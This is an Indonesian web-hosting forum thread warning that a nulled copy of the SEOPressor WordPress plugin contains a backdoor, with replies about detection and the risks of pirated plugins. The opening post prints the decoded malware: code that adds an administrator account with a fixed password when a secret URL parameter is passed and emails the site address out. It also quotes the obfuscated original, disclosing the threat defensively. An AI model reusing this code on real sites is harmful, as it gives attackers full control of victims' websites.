Hati2 SEOPressor Nulled, Ada Backdoor-nya $OOO0O0O00

[PusatHosting]

Baru saja menemukan file agak aneh milik client di plugin seopressor dan setelah googling akhirnya menemukan bahwa file tersebut merupakan bawaan dari plugin seopressor yang nulled.

hasil decode dengan unphp http://www.unphp.net/decode/d53ec81359b31def2888105e0462a5a1/

<?php ?><?php
add_action('wp_head', 'vg4beaws');
function vg4beaws() {
If ($_GET['cms'] == 'jjoplmh') {
require ('wp-includes/registration.php');
If (!username_exists('wordpress')) {
$user_id = wp_create_user('wordpress', 'gh67io9Cjm');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
add_action('wp_head', 'm6yascfv');
function m6yascfv() {
If (!username_exists('wordpress')) {
$addressdecode = base64_decode("cGhpbGx5Y2hhZEBnbXguY29t");
$vari = 'Wordpress Plugin covertplayer';
mail($addressdecode, get_bloginfo('wpurl'), $vari);
}
}
?><?php

sebagian dari script aslinya ini

<?php //
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=23904;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO000

Jika plugin aktif maka hacker bisa dengan mudah meng-insert user baru dengan level akses administrator dan selanjutnya hacker bisa melakukan apapun pada website target.

Silahkan dimasukkan ke database scan manual karena maldet belum bisa mendeteksi dan kalau menggunakan http://www.abuseat.org/findbot.pl bisa tapi sayang tidak mengirim email alert.

Sumber lain : http://bestblackhatforum.com/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates?page=7

 

[pluto01]

Thanks sharednya Mas

 

[susan]

bisa dishare md5 hash utk filenya, thanks

 

[Indodata]

Beberapa yang saya temukan seperti theme nulled, plugin terkadang disisipin sesuatu ntah itu backdor, cryptoPHP dll
Sebaiknya gunakan versi asli atau cari yang free yang powerfull.

 

[PusatHosting]

bisa dishare md5 hash utk filenya, thanks

Filternya berdasarkan string yang ada di dalamnya saja tidak menggunakan md5

 

[pangeran1995]

terima kasih sharenya mas mungkin bisa kita cek ricek

 

[idnix]

nulled emang rata2 begitu kan om?

 

[sigmabisnis]

Thanks for infonya mas.

 

[PusatHosting]

nulled emang rata2 begitu kan om?

Iya betul, tapi untuk seopressor ini semenjak saya beli masih murah beberapa tahun lalu baru kali ini tahu ada nulled-nya dan ada backdoornya lagi.

 

[masiqbal]

Masalahnya banyak orang awam yg tidak tahu resiko menggunakan unofficial plugin (apalagi nulled), yg dia pikir hanya bagaimana caranya agar websitenya bagus.